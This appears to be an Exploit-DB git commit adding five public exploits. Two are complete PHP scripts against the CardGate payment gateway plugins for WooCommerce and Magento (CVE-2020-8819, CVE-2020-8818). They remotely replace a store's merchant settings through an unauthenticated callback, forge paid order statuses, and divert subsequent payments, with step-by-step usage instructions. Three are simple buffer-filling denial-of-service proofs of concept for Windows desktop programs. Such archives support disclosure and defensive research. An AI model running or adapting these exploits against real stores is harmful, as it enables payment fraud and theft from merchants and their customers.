From 17bb415ff83f3acfe9fa61bf5ebf34432f09789d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 26 Feb 2020 05:01:51 +0000
Subject: [PATCH] DB: 2020-02-26

5 changes to exploits/shellcodes

SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
aSc TimeTables 2020.11.4 - Denial of Service (PoC)
Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)
WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
---
 exploits/php/webapps/48134.php | 174 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/48135.php | 178 +++++++++++++++++++++++++++++++++
 exploits/windows/dos/48132.py  |  27 +++++
 exploits/windows/dos/48133.py  |  32 ++++++
 exploits/windows/dos/48136.py  |  32 ++++++
 files_exploits.csv             |   5 +
 6 files changed, 448 insertions(+)
 create mode 100644 exploits/php/webapps/48134.php
 create mode 100644 exploits/php/webapps/48135.php
 create mode 100755 exploits/windows/dos/48132.py
 create mode 100755 exploits/windows/dos/48133.py
 create mode 100755 exploits/windows/dos/48136.py

diff --git a/exploits/php/webapps/48134.php b/exploits/php/webapps/48134.php
new file mode 100644
index 000000000..93913c487
--- /dev/null
+++ b/exploits/php/webapps/48134.php
@@ -0,0 +1,174 @@
+# Exploit Title: WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
+# Discovery Date: 2020-02-02
+# Public Disclosure Date: 2020-02-22
+# Exploit Author: GeekHack
+# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
+# Software Link: https://github.com/cardgate/woocommerce/releases/tag/v3.1.15
+# Version: <= 3.1.15
+# Tested on: WordPress 5.3.2 + WooCommerce 3.9.1 + CardGate Payment Gateway Plugin 3.1.15
+# CVE: CVE-2020-8819
+
+<?php
+/*
+  Description:
+
+  Lack of origin authentication (CWE-346) at IPN callback processing function allow (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store).
+
+  [code ref: https://github.com/cardgate/woocommerce/blob/f2111af7b1a3fd701c1c5916137f3ac09482feeb/cardgate/cardgate.php#L426-L442]
+*/
+
+/*
+  Usage:
+
+  1. Change values of the constants (see below for TARGET & ORDER)
+  2. Host this script somewhere (must be public accessible)
+  3. Register a merchant at https://cardgate.com
+  4. Sign into "My CardGate" dashboard
+  5. Add fake site or choose existing one
+  6. Click "Setup your Webshop" button in site preferences
+  7. Paste the URL of this script into the pop-up window and click "Save"
+  8. The target store now uses the settings of your site, enjoy :]
+
+  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
+*/
+
+// -------- Options (start) --------
+define('TARGET', 'http://domain.tld'); // without trailing slash, pls
+define('ORDER', 0); // provide non-zero value to automagically spoof order status
+// --------- Options (end) ---------
+
+define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
+define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');
+
+/**
+ * Original function from CardGate API client library (SDK) with minor changes
+ * @param string $sToken_ 
+ * @param bool $bTestmode_ 
+ * @return string
+ */
+function pullConfig($sToken_, $bTestmode_ = FALSE) {
+	if (!is_string($sToken_)) {
+		throw new Exception('invalid token for settings pull: ' . $sToken_);
+	}
+
+	$sResource = "pullconfig/{$sToken_}/";
+	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;
+
+	$rCh = curl_init();
+	curl_setopt($rCh, CURLOPT_URL, $sUrl);
+	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
+	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
+	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
+		'Content-Type: application/json',
+		'Accept: application/json'
+	]);
+	if ($bTestmode_) {
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
+	} else {
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
+	}
+
+	if (FALSE == ($sResults = curl_exec($rCh))) {
+		$sError = curl_error($rCh);
+		curl_close($rCh);
+		throw new Exception('Client.Request.Curl.Error: ' . $sError);
+	} else {
+		curl_close($rCh);
+	}
+	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
+		throw new Exception('remote gave invalid JSON: ' . $sResults);
+	}
+	if (isset($aResults['error'])) {
+		throw new Exception($aResults['error']['message']);
+	}
+
+	return $aResults;
+}
+
+/**
+ * Original function from CardGate API client library (SDK) with minor changes
+ * @param string $sUrl 
+ * @param array $aData_ 
+ * @param string $sHttpMethod_ 
+ * @return string
+ */
+function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
+	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
+		throw new Exception('invalid http method: ' . $sHttpMethod_);
+	}
+
+	$rCh = curl_init();
+	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
+	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
+	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
+	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
+
+	if ('POST' == $sHttpMethod_) {
+		curl_setopt($rCh, CURLOPT_URL, $sUrl);
+		curl_setopt($rCh, CURLOPT_POST, TRUE);
+		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
+	} else {
+		$sUrl = $sUrl
+			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
+			. http_build_query($aData_)
+		;
+		curl_setopt($rCh, CURLOPT_URL, $sUrl);
+	}
+
+	$response = curl_exec($rCh);
+	if (FALSE == $response) {
+		$sError = curl_error($rCh);
+		curl_close($rCh);
+		throw new Exception('Client.Request.Curl.Error: ' . $sError);
+	} else {
+		curl_close($rCh);
+	}
+
+	return $response;
+}
+
+if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
+	try {
+		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
+		$aConfigData = $aResult['pullconfig']['content'];
+		$response = doRequest(TARGET, $_REQUEST);
+		if ($response == $aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200') {
+			if (ORDER) {
+				$payload = [
+					'testmode' => $_REQUEST['testmode'],
+					'reference' => random_int(10000000000, 99999999999) . ORDER,
+					'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
+					'currency' => '',
+					'amount' => 0,
+					'status' => 'success',
+					'code' => 200
+				];
+				$payload['hash'] = md5(
+					(!empty($payload['testmode']) ? 'TEST' : '')
+					. $payload['transaction']
+					. $payload['currency']
+					. $payload['amount']
+					. $payload['reference']
+					. $payload['code']
+					. $aConfigData['site_key']
+				);
+				$response = doRequest(TARGET . '/?cgp_notify=true', $payload);
+				if ($response == $payload['transaction'] . '.' . $payload['code']) {
+					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+				} else {
+					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
+				}
+			} else {
+				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+			}
+		} else {
+			throw new Exception("It seems target is not vulnerable ($response)");
+		}
+	} catch (\Exception $oException_) {
+		die(htmlspecialchars($oException_->getMessage()));
+	}
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/48135.php b/exploits/php/webapps/48135.php
new file mode 100644
index 000000000..c7cea2d81
--- /dev/null
+++ b/exploits/php/webapps/48135.php
@@ -0,0 +1,178 @@
+# Exploit Title: Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
+# Discovery Date: 2020-02-02
+# Public Disclosure Date: 2020-02-22
+# Exploit Author: GeekHack
+# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
+# Software Link: https://github.com/cardgate/magento2/releases/tag/v2.0.30
+# Version: <= 2.0.30
+# Tested on: Magento 2.3.4 + CardGate Payment Gateway Module 2.0.30
+# CVE: CVE-2020-8818
+
+<?php
+/*
+  Description:
+
+  Lack of origin authentication (CWE-346) at IPN callback processing function allow (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store).
+
+  [code ref: https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107]
+*/
+
+/*
+  Usage:
+
+  1. Change values of the constants (see below for TARGET & ORDER*)
+  2. Host this script somewhere (must be public accessible)
+  3. Register a merchant at https://cardgate.com
+  4. Sign into "My CardGate" dashboard
+  5. Add fake site or choose existing one
+  6. Click "Setup your Webshop" button in site preferences
+  7. Paste the URL of this script into the pop-up window and click "Save"
+  8. The target store now uses the settings of your site, enjoy :]
+
+  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
+*/
+
+// -------- Options (start) --------
+define('TARGET', 'http://domain.tld'); // without trailing slash, pls
+define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
+define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
+define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
+define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
+// --------- Options (end) ---------
+
+define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
+define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');
+
+/**
+ * Original function from CardGate API client library (SDK) with minor changes
+ * @param string $sToken_ 
+ * @param bool $bTestmode_ 
+ * @return string
+ */
+function pullConfig($sToken_, $bTestmode_ = FALSE) {
+	if (!is_string($sToken_)) {
+		throw new Exception('invalid token for settings pull: ' . $sToken_);
+	}
+
+	$sResource = "pullconfig/{$sToken_}/";
+	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;
+
+	$rCh = curl_init();
+	curl_setopt($rCh, CURLOPT_URL, $sUrl);
+	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
+	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
+	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
+		'Content-Type: application/json',
+		'Accept: application/json'
+	]);
+	if ($bTestmode_) {
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
+	} else {
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
+	}
+
+	if (FALSE == ($sResults = curl_exec($rCh))) {
+		$sError = curl_error($rCh);
+		curl_close($rCh);
+		throw new Exception('Client.Request.Curl.Error: ' . $sError);
+	} else {
+		curl_close($rCh);
+	}
+	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
+		throw new Exception('remote gave invalid JSON: ' . $sResults);
+	}
+	if (isset($aResults['error'])) {
+		throw new Exception($aResults['error']['message']);
+	}
+
+	return $aResults;
+}
+
+/**
+ * Original function from CardGate API client library (SDK) with minor changes
+ * @param string $sUrl 
+ * @param array $aData_ 
+ * @param string $sHttpMethod_ 
+ * @return string
+ */
+function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
+	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
+		throw new Exception('invalid http method: ' . $sHttpMethod_);
+	}
+
+	$rCh = curl_init();
+	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
+	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
+	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
+	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
+
+	if ('POST' == $sHttpMethod_) {
+		curl_setopt($rCh, CURLOPT_URL, $sUrl);
+		curl_setopt($rCh, CURLOPT_POST, TRUE);
+		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
+	} else {
+		$sUrl = $sUrl
+			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
+			. http_build_query($aData_)
+		;
+		curl_setopt($rCh, CURLOPT_URL, $sUrl);
+	}
+
+	$response = curl_exec($rCh);
+	if (FALSE == $response) {
+		$sError = curl_error($rCh);
+		curl_close($rCh);
+		throw new Exception('Client.Request.Curl.Error: ' . $sError);
+	} else {
+		curl_close($rCh);
+	}
+
+	return $response;
+}
+
+if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
+	try {
+		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
+		$aConfigData = $aResult['pullconfig']['content'];
+		$response = doRequest(TARGET . '/cardgate/payment/callback', $_REQUEST, 'GET');
+		if ($response == $aConfigData['merchant_id'] . '.' . $aConfigData['site_id'] . '.200') {
+			if (ORDER) {
+				$payload = [
+					'testmode' => $_REQUEST['testmode'],
+					'reference' => ORDER,
+					'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
+					'currency' => ORDER_CURRENCY,
+					'amount' => ORDER_AMOUNT * 100,
+					'status' => 'success',
+					'code' => 200,
+					'pt' => ORDER_PAYMENT_TYPE
+				];
+				$payload['hash'] = md5(
+					(!empty($payload['testmode']) ? 'TEST' : '')
+					. $payload['transaction']
+					. $payload['currency']
+					. $payload['amount']
+					. $payload['reference']
+					. $payload['code']
+					. $aConfigData['site_key']
+				);
+				$response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET');
+				if ($response == $payload['transaction'] . '.' . $payload['code']) {
+					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+				} else {
+					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
+				}
+			} else {
+				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+			}
+		} else {
+			throw new Exception("It seems target is not vulnerable ($response)");
+		}
+	} catch (\Exception $oException_) {
+		die(htmlspecialchars($oException_->getMessage()));
+	}
+}
\ No newline at end of file
diff --git a/exploits/windows/dos/48132.py b/exploits/windows/dos/48132.py
new file mode 100755
index 000000000..366640f70
--- /dev/null
+++ b/exploits/windows/dos/48132.py
@@ -0,0 +1,27 @@
+# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
+# Date: 2020-24-02
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.nsauditor.com/
+# Software Link: http://www.nsauditor.com/spotftp.html
+# Version: 2.4.8
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+#STEPS
+# Open the program SpotFTP-FTP Password Recover
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "RandomLetter.txt"
+# Click in the  Enter Registration Code
+# In the field Key put the content of the file "RandomLetter.txt"
+# End :)
+
+buffer = 'Z' * 1000
+
+try: 
+    file = open("RandomLetter.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/48133.py b/exploits/windows/dos/48133.py
new file mode 100755
index 000000000..c0ada5cdb
--- /dev/null
+++ b/exploits/windows/dos/48133.py
@@ -0,0 +1,32 @@
+# Exploit Title: aSc TimeTables 2020.11.4 - Denial of Service (PoC)
+# Date: 2020-24-02
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.asctimetables.com/#!/home
+# Software Link: https://www.asctimetables.com/#!/home/download
+# Version: 2020.11.4
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+# STEPS
+# Open the program aSc Timetables 2020
+# In File select the option New
+# Put any letter in the fiel Name of the Schooland click Next
+# In the next Windows click NEXT
+# In the Step 3, in Subject click in New 
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Tables.txt"
+# Paste the content in the field Subject title
+# Click in OK
+# End :)
+
+
+buffer = 'Z' * 1000
+
+try: 
+    file = open("Tables.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/48136.py b/exploits/windows/dos/48136.py
new file mode 100755
index 000000000..e6ede85fe
--- /dev/null
+++ b/exploits/windows/dos/48136.py
@@ -0,0 +1,32 @@
+# Exploit Title : Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)
+# Exploit Author : Berat Isler
+# Date : 2020-02-25
+# Vendor Homepage : https://odin-secure-ftp-expert.jaleco.com/
+# Software Link Download :
+http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
+# Version : Odin Secure FTP Expert 7.6.3
+# Tested on : Windows 7 32-bit
+
+# First step , run exploit script, it will generate a new file with the
+name "bune.txt"
+# Then start Odin Secure FTP application and find the "connect" tab . After
+that you can click
+Quickconnect site tab.
+# After that paste the content of "bune.txt" in to the all fields like this
+--> "AAAAAA" than click connect button
+# Application will be crash .
+
+This is the generated payload code :
+
+#!/usr/bin/python
+
+bune = "A" * 6000
+payload = bune
+try:
+f=open("bune.txt","w")
+print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created "
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8d4b7d2cb..006e2dde2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6681,6 +6681,9 @@ id,file,description,date,author,type,platform,port
 48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows,
 48111,exploits/windows/dos/48111.py,"Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)",2020-02-24,"Cody Winkler",dos,windows,
 48121,exploits/linux/dos/48121.py,"Go SSH servers 0.0.2 - Denial of Service (PoC)",2020-02-24,"Mark Adams",dos,linux,
+48132,exploits/windows/dos/48132.py,"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
+48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
+48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42399,3 +42402,5 @@ id,file,description,date,author,type,platform,port
 48125,exploits/aspx/webapps/48125.txt,"DotNetNuke 9.5 - File Upload Restrictions Bypass",2020-02-24,"Sajjad Pourali",webapps,aspx,
 48127,exploits/hardware/webapps/48127.pl,"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,
+48134,exploits/php/webapps/48134.php,"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,
+48135,exploits/php/webapps/48135.php,"Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,